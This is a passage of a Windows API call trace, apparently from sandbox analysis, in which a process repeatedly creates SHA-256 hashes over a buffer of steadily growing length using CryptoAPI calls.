	[0229.962] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231de18
	[0229.962] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231de18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231de18, pdwDataLen=0x128ba4) returned 1
	[0229.962] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.962] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.962] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.963] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.963] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0229.963] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231de40
	[0229.963] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231de40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231de40, pdwDataLen=0x128ba4) returned 1
	[0229.963] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.963] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.963] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.963] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.963] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0229.963] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231de68
	[0229.963] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231de68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231de68, pdwDataLen=0x128ba4) returned 1
	[0229.963] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.963] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.963] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.964] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.964] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0229.964] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231de90
	[0229.964] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231de90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231de90, pdwDataLen=0x128ba4) returned 1
	[0229.964] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.964] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.964] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.964] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.964] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0229.964] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231deb8
	[0229.964] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231deb8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231deb8, pdwDataLen=0x128ba4) returned 1
	[0229.964] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.965] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.965] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.965] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.965] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0229.965] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dee0
	[0229.965] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dee0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dee0, pdwDataLen=0x128ba4) returned 1
	[0229.965] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.965] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.965] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.965] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.965] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0229.965] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.965] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231df08
	[0229.966] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231df08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231df08, pdwDataLen=0x128ba4) returned 1
	[0229.966] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.966] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.966] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.966] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.966] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0229.966] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231df30
	[0229.966] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231df30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231df30, pdwDataLen=0x128ba4) returned 1
	[0229.966] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.966] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.966] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.966] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.966] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0229.966] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231df58
	[0229.967] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231df58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231df58, pdwDataLen=0x128ba4) returned 1
	[0229.967] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.967] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.967] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.967] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.967] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0229.967] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231df80
	[0229.967] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231df80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231df80, pdwDataLen=0x128ba4) returned 1
	[0229.967] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.967] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.967] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.967] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.968] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0229.968] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dfa8
	[0229.968] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dfa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dfa8, pdwDataLen=0x128ba4) returned 1
	[0229.968] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.968] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.968] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.968] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.968] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0229.968] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dfd0
	[0229.968] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231dfd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dfd0, pdwDataLen=0x128ba4) returned 1
	[0229.968] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.968] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.968] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.969] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.969] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0229.969] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231dff8
	[0229.969] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231dff8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231dff8, pdwDataLen=0x128ba4) returned 1
	[0229.969] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.969] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.969] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.969] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.969] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0229.969] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e020
	[0229.969] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e020, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e020, pdwDataLen=0x128ba4) returned 1
	[0229.969] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.969] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.969] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.970] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.970] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0229.970] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e048
	[0229.970] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e048, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e048, pdwDataLen=0x128ba4) returned 1
	[0229.970] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.970] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.970] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.970] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.970] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0229.970] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e070
	[0229.970] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e070, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e070, pdwDataLen=0x128ba4) returned 1
	[0229.970] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.970] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.970] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.971] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.971] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0229.971] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e098
	[0229.971] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e098, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e098, pdwDataLen=0x128ba4) returned 1
	[0229.971] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.971] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.971] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.971] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.971] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0229.971] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e0c0
	[0229.971] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e0c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e0c0, pdwDataLen=0x128ba4) returned 1
	[0229.971] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.971] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.971] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.972] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.972] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0229.972] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e0e8
	[0229.972] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e0e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e0e8, pdwDataLen=0x128ba4) returned 1
	[0229.972] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.972] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.972] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.972] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.972] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0229.972] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e110
	[0229.972] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e110, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e110, pdwDataLen=0x128ba4) returned 1
	[0229.972] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.972] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.972] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.973] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.973] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0229.973] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e138
	[0229.973] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e138, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e138, pdwDataLen=0x128ba4) returned 1
	[0229.973] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.973] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.973] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.973] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.973] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0229.973] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e160
	[0229.973] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e160, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e160, pdwDataLen=0x128ba4) returned 1
	[0229.973] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.973] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.973] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.974] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.974] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0229.974] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e188
	[0229.974] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e188, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e188, pdwDataLen=0x128ba4) returned 1
	[0229.974] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.974] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.974] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.974] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.974] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0229.974] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e1b0
	[0229.974] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231e1b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e1b0, pdwDataLen=0x128ba4) returned 1
	[0229.974] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.974] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.974] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.975] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.975] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0229.975] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231e1d8
	[0229.975] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231e1d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231e1d8, pdwDataLen=0x128ba4) returned 1
	[0229.975] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.975] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.975] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.975] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.975] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0229.975] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
